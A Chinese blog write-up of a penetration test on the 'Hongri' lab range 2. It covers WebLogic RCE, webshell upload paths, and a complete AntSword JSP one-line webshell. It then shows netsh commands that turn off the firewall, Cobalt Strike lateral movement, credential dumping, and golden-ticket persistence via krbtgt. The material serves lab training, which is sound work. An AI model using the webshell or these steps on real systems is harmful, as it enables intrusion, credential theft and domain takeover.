首页 > 其他分享 >红日靶场2-渗透过程

红日靶场2-渗透过程

时间:2024-07-12 14:43:18浏览次数:6  
标签:红日 shell 渗透 主机 DC 网卡 jsp 10.10 靶场

一、环境搭建

注意:靶机通用密码: 1qaz@WSX

这里设置两个网卡
image

三台虚拟机配置如下:

kali机:192.168.230.131(VMnet8 网卡随机分配的IP)
PC机:192.168.230.201(外网ip),10.10.10.201(内网ip)
DC机:10.10.10.10(域控)
WEB机:192.168.230.80(外网),10.10.10.80(内网)

(1)PC机配置

PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。
image
进去之后查看网卡,会有账户控制窗口弹出,账户密码:administrator/1qaz@WSX
image
这里需要使用我们自己的nat网段
image
配置成功
image

(2)DC机配置

DC主机只有一张网卡
image
image

(3)WEB机配置

WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络

image

这里WEB主机以administrator第一次登录时没有密码,登录后会要求重新设置密码
(这里我设置的是1qaz@wsx)

image

这里和PC机操作一样

image

进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行statweblogic服务。注意要以管理员身份运行

image

二、外网渗透

(1)信息收集

探测一下存活主机
image

使用goby对目标进行扫描,开放了一些高危端口,3389,7001,445

image

image

goby探测出有weblogicRCE漏洞

image

(2)weblogic漏洞利用

使用weblogic漏洞利用工具RCE

image

上传shell,路径选择
1、把shell写到控制台images目录中

上传路径:C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

这里需要访问:http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp

2、写到uddiexplorer目录中

路径:C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp

访问:http://*.*.*.*:7001/uddiexplorer/shell.jsp

3:在应用安装目录中

路径:C:\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp

访问:http://*.*.*.*:7001/项目名/shell.jsp

这里我们尝试第一种,使用的蚁剑jsp一句话木马

<%!
class U extends ClassLoader {
    U(ClassLoader c) {
        super(c);
    }
    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }
}

public byte[] base64Decode(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
    new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>

image

蚁剑成功连接

image

关闭防火墙

netsh advfirewall show all state  		  //查看防火墙状态
netsh firewall set opmode disable             #winsows server 2003 之前
netsh advfirewall set allprofiles state off   #winsows server 2003 之后

image

三、内网渗透

(1)cs上线

cs生成木马,蚁剑执行木马上线cs

image

cs上提权成功

image

(2)内网信息收集

shell ipconfig /all   收集域 ip

发现机器有双网卡,内网 10.10.10.1/24 网段,域控 ip 10.10.10.10(域控一般是本机的DNS服务器)

image

内网存活主机探测加端口扫描

portscan 10.10.10.0/24

发现都开着445,3389端口

image

收集账户密码

image
image

(3)横向移动

1、rdesktop(3389rdp远程连接)

image

成功连接

image

因为其它两台主机都开启了3389,所以可以 以192.168.230.80作为跳板连接其它两台主机

image

image

2、利用cs

新建一个 Listener,选择之前获取到的凭据信息(明文密文均可),选择 Listener 及主机 Session

image

image

image

DC成功上线:

image

(4)权限维持

黄金票据

从DC中hashdump出krbtgt的hash值,krbtgt用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

image

在DC查看域的sid,使用mimikatz

image

在WEB机 Administrator 权限机器生成黄金票据

image

image

直接远程连接dir域控c盘成功

shell dir \\10.10.10.10\c$

image

标签:红日,shell,渗透,主机,DC,网卡,jsp,10.10,靶场
From: https://www.cnblogs.com/pa0fu/p/18298322

相关文章

  • upload-labs靶场全题解
    ​​靶场搭建对php和apache版本有严格要求,建议使用phpstudy2018并且使用设置php版本为5.2.17,这个靶场比较老了,如果要复现的话,必要严格按照要求来使用,博主使用最新版的phpstudy在某些靶场上未能成功复现,所以浪费了很多时间。。。。。Upload-Labs环境要求操作系统:wind......
  • 渗透测试全流程
    1信息收集渗透测试中的信息收集是关键的初始阶段,其作用在于系统性地获取目标系统、网络或应用的详细信息,包括域名及子域名信息、目标网站系统、CMS指纹、目标网站IP、开放的端口等1.1在Kali机中使用命令进行信息收集  命令的具体使用请参考另外一篇文章  网址:K......
  • 渗透测试-信息收集工具
    domainscan调用subfinder被动收集,调用ksubdomain进行dns验证泛解析,CDN判断获取domain相关的web(host:port)资产,使用webscan扫描webscan支持http/httpsscheme自动判断获取statusCode、contentLength、favicon、iconHash、title、wappalyzer、fin"title自动中文解码j......
  • sqli-labs靶场第一关过关教程(保姆级教程:不是新手别进)
    SQL注入漏洞概述1、什么是SQL注入漏洞SQL注入漏洞是一个web层面的安全漏洞,web应用与数据库存在交互点,攻击者构建恶意SQL语句,欺骗数据库服务器执行非授权的查询。2、如何判断网页是否存在SQL注入漏洞1、web页面与数据库是否存在交互点,这个交互点就是注入点常见注入点:URL和......
  • 生产实习--启明星辰 第三天(文件漏洞的实战,靶场和phpstudy环境的配置)
    环境的下载与配置在这次实践中会用到,phpstudy,burpsuite以及靶场upload-labs。对于burpsuite的配置可以参照下面这篇文章。burpsuite的安装与配置-CSDN博客对于phpstudy,我们首先进入官网(Windows版phpstudy下载-小皮面板(phpstudy)(xp.cn))进行下载,最好是下载2018的版本......
  • 实战篇——XSS漏洞dedecms渗透实战
    实战篇——XSS漏洞dedecms渗透实战XSS渗透实战本节借助XSS平台通过存储型XSS盲打实现管理员session劫持,进而上传一句话木马获得服务器权限。创建xss项目:将生成的xss代码植入评论:发表,提示正在审核:模拟管理员查看待审核的评论:查看xss项目,此时已经获得管理员的cookie以及......
  • 实战篇——XSS漏洞xss-labs-master靶场实战一
    实战篇——XSS漏洞xss-labs-master靶场实战(1)XSS的分类(1)反射型XSS攻击者通过电子邮件等方式将恶意链接发送给目标用户。当目标用户点击该链接时,服务器接收该目标用户的请求并把带有恶意脚本的页面发送给目标用户的浏览器,浏览器解析页面时就会执行恶意脚本。(2)存储型XSS......
  • Vulnhub靶场DC-6练习
    目录0x00准备0x01主机信息收集0x02站点信息收集1.wordpress扫描2.wordlists字典爆破0x03漏洞查找与利用1.漏洞查找2.CVE-2018-15877漏洞利用3.反弹shell5.nmap提权0x04总结0x00准备下载链接:https://download.vulnhub.com/dc/DC-6.zip介绍:CLUEOK,th......
  • Linux应急响应——知攻善防应急靶场-Linux(1)
    目录查看history历史指令查看开机自启动项异常连接和端口异常进程定时任务异常服务日志分析账户排查总结靶场出处是知攻善防Linux应急响应靶机1前景需要:小王急匆匆地找到小张,小王说"李哥,我dev服务器被黑了",快救救我!!挑战内容:黑客的IP地址遗留下的三个flag开机后桌面找到......
  • 记pWnOS1.0靶机渗透测试
    前言学校给开的培训课的作业,正好记录一下。我自己拿不到root权限,所以还是参考了一下别人的教程参考:红队打靶:pWnOS1.0打靶思路详解之webmin漏洞利用(vulnhub)_pwnos1.0靶机-CSDN博客pWnOS1.0查看靶机网络先查看kali的ip:ifconfigapr扫描获取该网段所有主机扫描后可以知......